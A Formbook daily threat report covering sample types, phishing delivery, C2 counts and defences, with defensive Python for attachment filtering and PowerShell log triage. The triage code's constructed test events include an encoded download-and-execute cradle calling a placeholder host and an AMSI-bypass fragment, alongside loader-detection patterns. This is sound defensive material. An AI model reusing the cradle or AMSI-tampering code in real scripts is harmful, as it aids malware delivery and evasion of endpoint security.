Formbook - Daily Threat Report

Thursday, April 30, 2026

Daily Summary

Formbook activity surged today with 39 new samples detected, roughly 28% above the 7-day average (about 30 per day). This marks a notable uptick after several days of near-average volume, driven primarily by a sharp rise in PowerShell-based loaders.

New Samples Detected

PowerShell scripts (.ps1) dominate today's haul at 25 samples, 64% of all new files. That is a clear shift from the recent mix, in which .js and .exe often shared equal footing: .js dropped to 6 and .exe to 3, suggesting operators are doubling down on script-host delivery, where the payload is interpreted by a trusted, signed binary (powershell.exe, wscript.exe, cmd.exe) rather than dropped as a fresh PE, to get past static file scanning. One .vbe file and one .cmd file show continued low-volume experimentation with alternate script hosts; the remaining three samples are of types not broken out here.

Distribution Methods

The heavy reliance on .ps1 files points to delivery via phishing emails, either as attachments with double extensions (e.g., invoice_2026-04-30.pdf.ps1) or as links to hosted PowerShell scripts. Note that Windows opens a double-clicked .ps1 in Notepad rather than executing it, so a .ps1 attachment is normally launched by a wrapper (a .lnk, .cmd or .js that calls powershell.exe) or fetched and run by an earlier stage; the wrapper types belong to the same delivery chain and should be filtered together. The .js files likely arrive as JScript attachments inside malicious ZIP archives, executed by wscript.exe when opened. The lone .vbe and .cmd files may serve as secondary droppers in multistage campaigns. No geographic distribution data is available, but the script-heavy payloads align with current malspam trends.
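A mail-gateway attachment check for the delivery paths described above (double-extension script lures, scripts inside ZIP archives, and the wrapper types that launch .ps1), written as an added example rather than code from the report or its data sources. The filenames, the in-memory archive and the approved-hash set are constructed; the extension lists are illustrative and should be tuned to the environment.

```python
"""Mail-gateway attachment rule for the script-host payloads in today's
report (.ps1, .js, .vbe, .cmd), covering the double-extension lure and the
script-inside-ZIP case. Added example, not code from the report's sources;
filenames, archive contents and the approved-hash list are constructed."""
from __future__ import annotations

import hashlib
import io
import zipfile

# Extensions Windows hands to a script host (wscript/cscript, cmd.exe, mshta,
# powershell.exe). A double-clicked .ps1 opens in Notepad, so the loader is
# usually launched by one of the other types here; block the whole family.
SCRIPT_EXTS = {".ps1", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".cmd", ".bat", ".lnk"}
# What a double-extension lure pretends to be.
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
ARCHIVE_EXTS = {".zip"}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def extensions(name: str) -> list[str]:
    """All dotted suffixes, lowercased: 'invoice.pdf.ps1' -> ['.pdf', '.ps1']."""
    base = name.lower().replace("\\", "/").rsplit("/", 1)[-1]
    parts = base.split(".")
    return ["." + p for p in parts[1:]] if len(parts) > 1 else []


def classify_name(name: str) -> tuple[str, str]:
    """Verdict ('block' | 'allow' | 'inspect') and reason for one filename."""
    exts = extensions(name)
    if not exts:
        return "allow", "no extension"
    final = exts[-1]
    if final in SCRIPT_EXTS:
        if len(exts) > 1 and exts[-2] in DOC_EXTS:
            return "block", f"double extension {exts[-2]}{final} posing as a document"
        return "block", f"script host extension {final}"
    if final in ARCHIVE_EXTS:
        return "inspect", "archive: inspect members"
    return "allow", "no script host extension"


def classify_attachment(name: str, data: bytes,
                        approved_hashes: frozenset[str] = frozenset()) -> tuple[str, str]:
    """Apply classify_name to the attachment and, for ZIPs, to each member, so
    'invoice.zip' holding 'invoice.pdf.js' is blocked. Explicit approval is by
    SHA-256 of the content, not by filename, which the sender controls."""
    if sha256_hex(data) in approved_hashes:
        return "allow", "explicitly approved by hash"
    verdict, reason = classify_name(name)
    if verdict != "inspect":
        return verdict, reason
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.namelist():
                v, r = classify_name(member)
                if v == "block":
                    return "block", f"archive member {member}: {r}"
    except zipfile.BadZipFile:
        # An archive the gateway cannot parse cannot be inspected: fail closed.
        return "block", "archive could not be parsed"
    return "allow", "archive members carry no script host extension"


def build_zip(members: dict[str, bytes]) -> bytes:
    """Build a small ZIP in memory (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member_name, content in members.items():
            zf.writestr(member_name, content)
    return buf.getvalue()


if __name__ == "__main__":
    samples = {
        "invoice_2026-04-30.pdf.ps1": b"Start-Process notepad",
        "report.pdf": b"%PDF-1.7",
        "invoice.zip": build_zip({"invoice.pdf.js": b"WScript.Echo('x')"}),
    }
    for n, d in samples.items():
        print(n, classify_attachment(n, d))
```

The rule only descends one level; nested or password-protected archives, which the gateway cannot open, should be routed to the same fail-closed branch as an unparsable file rather than allowed through.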

Detection Rate

94 new IOCs were submitted today. The report's sources do not carry per-vendor detection counts, so coverage can only be estimated: signature-based engines reliably flag well-known PowerShell obfuscation patterns, but heavily encoded (for example -EncodedCommand) or AMSI-tampering variants may pass gateway file scanning. The shift to .ps1 suggests operators are tuning their loaders against static file scanning at the gateway rather than against endpoint controls. AMSI hands the deobfuscated script content to the endpoint engine at execution time, so a loader that survives the gateway still has to disable or evade AMSI on the host, and that tampering is itself visible in PowerShell logging.

C2 Infrastructure

55 new C2 servers were identified today, a high count relative to sample volume (about 1.4 C2 entries per sample) that points to an infrastructure refresh ahead of, or alongside, the new wave. No geographic patterns were provided. Because C2 indicators are reported independently of samples, the ratio is indicative rather than a one-to-one mapping, but it is consistent with operators rotating endpoints aggressively to stay ahead of blocklisting.

7-Day Trend

Today's 28% spike above the 7-day average breaks the steady plateau seen earlier in the week. Activity appears to be ramping up, most likely a fresh phishing campaign built around PowerShell-based loaders.

Security Analysis

The disproportionate use of .ps1 over .exe and .js suggests Formbook operators anticipate gateway blocking of executable attachments and are leaning on PowerShell, which runs under a signed Microsoft binary that corporate environments rarely block outright. This mirrors tactics used in a 2025 campaign targeting logistics firms. Defensively, SOC teams should enable PowerShell script block logging (Group Policy: Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging), which writes the deobfuscated loader content to Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, add module logging (Event ID 4103) for pipeline detail, and block execution of .ps1 files, together with the .js, .vbe and .cmd wrappers that launch them, arriving as email attachments at the gateway unless explicitly approved. Constrained Language Mode, enforced through an AppLocker or WDAC policy, limits what an unapproved script can do if one does get through.
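A triage pass over script block log entries of the kind the recommendation above produces, and over the encoded variants discussed under Detection Rate, written as an added example (not code from the report or its data sources). It expands any -EncodedCommand argument, which is base64 of UTF-16LE text, and scores each 4104 block against the behaviours a script loader needs: download cradle, Invoke-Expression, hidden window, inline base64 decoding, AMSI tampering, reflective assembly loading. The events, ScriptBlockId values and command text are constructed, and the pattern list is illustrative rather than a complete Formbook signature.

```python
"""Triage PowerShell script block logging events (Event ID 4104) for the
loader behaviours a Formbook-style .ps1 stage needs. Added example; the
events below are constructed, not real telemetry."""
from __future__ import annotations

import base64
import re

# One regex per behaviour so the output names what the block does, not just
# that it matched. Illustrative, not a complete signature set.
LOADER_PATTERNS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "amsi_tamper": re.compile(r"amsiInitFailed|AmsiScanBuffer|AmsiUtils", re.I),
    "reflective_load": re.compile(r"\[Reflection\.Assembly\]::Load", re.I),
}

# -EncodedCommand and its short forms carry base64 of UTF-16LE text.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def expand_encoded(text: str) -> str:
    """Append the decoded form of every -EncodedCommand argument so the
    pattern scan sees the real command rather than the base64 blob.
    Arguments that are not valid base64/UTF-16LE are left untouched."""
    decoded = []
    for m in ENCODED_ARG.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return text if not decoded else text + "\n" + "\n".join(decoded)


def triage_script_block(text: str) -> list[str]:
    """Names of loader indicators present in one ScriptBlockText, in table order."""
    expanded = expand_encoded(text)
    return [name for name, rx in LOADER_PATTERNS.items() if rx.search(expanded)]


def triage_events(events: list[dict]) -> list[dict]:
    """Keep only 4104 events that carry at least one indicator."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        hits = triage_script_block(ev["ScriptBlockText"])
        if hits:
            findings.append({"ScriptBlockId": ev["ScriptBlockId"], "indicators": hits})
    return findings


# Constructed sample events. Block b2 is a wrapper stage that spawns a child
# PowerShell with an encoded cradle; c3 is the AMSI-tampering pattern the
# Detection Rate section warns about; d4 is a 4103 record and is skipped.
_cradle = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/l.txt')"
_encoded = base64.b64encode(_cradle.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockId": "a1",
     "ScriptBlockText": "Get-ChildItem C:\\Users | Measure-Object"},
    {"EventID": 4104, "ScriptBlockId": "b2",
     "ScriptBlockText": f"powershell -w hidden -enc {_encoded}"},
    {"EventID": 4104, "ScriptBlockId": "c3",
     "ScriptBlockText": "$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');"
                        "$a.GetField('amsiInitFailed','NonPublic,Static')"},
    {"EventID": 4103, "ScriptBlockId": "d4",
     "ScriptBlockText": "module logging record, not scored here"},
]

if __name__ == "__main__":
    for finding in triage_events(SAMPLE_EVENTS):
        print(finding["ScriptBlockId"], ", ".join(finding["indicators"]))
```

In production the same scoring can be applied to process command lines (Security 4688 or Sysmon Event ID 1), which is where the base64 launcher usually shows up first; script block logging then supplies the decoded content of whatever that launcher runs, including anything the loader fetches and executes later.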

Further Reading

Data Sources

MalwareBazaar (abuse.ch)
ThreatFox (abuse.ch)
URLhaus (abuse.ch)
